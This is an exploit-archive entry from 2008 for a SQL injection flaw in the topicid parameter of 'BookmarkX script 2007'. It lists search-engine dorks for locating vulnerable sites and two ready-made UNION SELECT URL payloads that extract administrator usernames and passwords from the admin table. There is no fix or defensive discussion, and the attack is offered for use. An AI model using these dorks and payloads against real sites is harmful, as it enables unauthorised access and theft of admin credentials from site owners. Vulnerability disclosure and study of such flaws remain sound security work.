BookmarkX script 2007 (topicid) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BookmarkX script 2007 (topicid) Remote SQL Injection Vulnerability
# Published : 2008-02-02
# Author : S@BUN
# Previous Title : Wordpress Plugin Wordspew Remote SQL Injection Vulnerability
# Next Title : phpShop <= 0.8.1 Remote SQL injection / Filter Bypass Vulnerabilities

#########################################################################
#
# BookmarkX script(Powered by GengoliaWebStudio)SQL Injection
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/
#
#########################################################################
# DorKs 1 : "2007 BookmarkX script"
#
# DORKS 2 : Powered by GengoliaWebStudio
#
# DORK 3 : allinurl :"index.php?menu=showtopic"
#
#########################################################################
# EXPLOIT :
#
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6/**/FROM/**/admin/*%20admin=1

or

index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6,7/**/FROM/**/admin/*%20admin=1
##########################################################################
# S@BUN                   www.hackturkiye.com                     S@BUN #########################################################################
#########################################################################
# S@BUN                    GOOD LUCKY                              S@BUN
#########################################################################

# www.Syue.com [2008-02-02]